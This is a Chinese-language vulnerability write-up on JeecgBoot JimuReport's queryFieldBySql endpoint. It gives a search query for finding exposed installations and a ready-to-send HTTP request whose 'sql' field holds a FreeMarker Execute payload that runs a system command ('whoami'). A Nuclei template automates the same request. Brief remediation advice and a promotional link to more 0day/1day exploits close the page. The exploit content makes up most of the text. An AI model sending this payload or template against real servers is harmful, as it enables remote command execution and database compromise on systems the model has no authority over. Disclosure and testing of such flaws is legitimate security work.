》》》产品描述《《《

        积木报表，是一款免费的企业级Web报表工具，像搭建积木一样在线设计报表!功能涵盖，数据报表、打印设计、图表报表、大屏设计等!

---

》》》漏洞描述《《《

        JeecgBoot 积木报表 queryFieldBySq| 接口存在一个 SQL 注入漏洞，通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权，从而查看、修改甚至删除数据库中的数据，严重威胁系统的安全性。

---

》》》搜索语句《《《

title="Jeecg-Boot 快速开发平台" || body="积木报表"

---

》》》漏洞复现《《《

POST /jmreport/queryFieldBySql HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Content-Length: 100
Content-Type: application/json; charset=utf-8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive{"sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'"}

yaml

id: JeecgBoot 积木报表 queryFieldBySqlinfo:name: JeecgBoot 积木报表 queryFieldBySqlauthor: Kelicehnseverity: highhttp:- raw:- |POST /jmreport/queryFieldBySql HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36Content-Length: 100Content-Type: application/json; charset=utf-8Accept-Encoding: gzip, deflate, brConnection: keep-alive{"sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'"}matchers-condition: andmatchers:- type: statusstatus:- 200- type: wordwords:- "freemarker.template.utility.Execute"- "$(whoami)"

---

》》》修复建议《《《

1、如非必要，禁止公网访问该系统。
2、通过防火墙等安全设备设置访问策略，设置白名单访问。
3、升级产品到最新版本

---

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------